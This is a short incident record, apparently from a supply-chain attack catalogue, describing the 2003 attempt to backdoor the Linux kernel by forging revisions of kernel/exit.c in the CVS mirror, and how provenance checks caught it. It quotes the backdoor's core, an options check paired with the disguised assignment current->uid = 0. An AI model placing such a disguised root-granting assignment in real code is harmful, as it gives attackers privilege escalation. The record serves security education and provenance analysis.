Linux bk2cvs mirror received backdoor

In November 2003, the Linux kernel was maintained in BitKeeper, with a separate CVS mirror available for developers who could not or would not use BitKeeper directly. An attacker modified the CVS-side kernel/exit.c history on kernel.bkbits.net instead of landing a real BitKeeper changeset. That distinction mattered: the poisoned revisions appeared in the mirror, but not in the authoritative development tree used for mainline integration.

The change was small enough to be read and large enough to matter. It lived in kernel/exit.c, in the wait path, and looked like an error check. The planted CVS revisions lacked normal BitKeeper logical-change backlinks, which made the source-control metadata as important as the C code.

The inserted code checked for options == (__WCLONE|__WALL) and then evaluated current->uid = 0, turning what looked like a comparison into an assignment that would make the caller root. BitMover's conversion checks caught the fraud quickly because normal CVS mirror entries carried logical-change backlinks to BitKeeper changesets, while the planted revisions did not. The incident became an early, concrete example of why source-control provenance matters as much as code review.

The attack failed because the mirror was not the source of truth. That is the important distinction for this record: the code change was malicious, but the project workflow still had an authoritative history that let maintainers separate a forged mirror revision from a real kernel change.

Motive

Unauthorized Access Control

Cause

Compromised Infrastructure

Transitive

No

• filekernel/exit.c
• codecurrent->uid = 0
• codeoptions == (__WCLONE|__WALL)

• The Linux Backdoor Attempt of 2003blog.citp.princeton.edu
• An attempt to backdoor the kernellwn.net
• BK2CVS problemlwn.net
• LWN: Almost rightlwn.net
• Phrack: Linux on-the-fly kernel patching without LKMphrack.org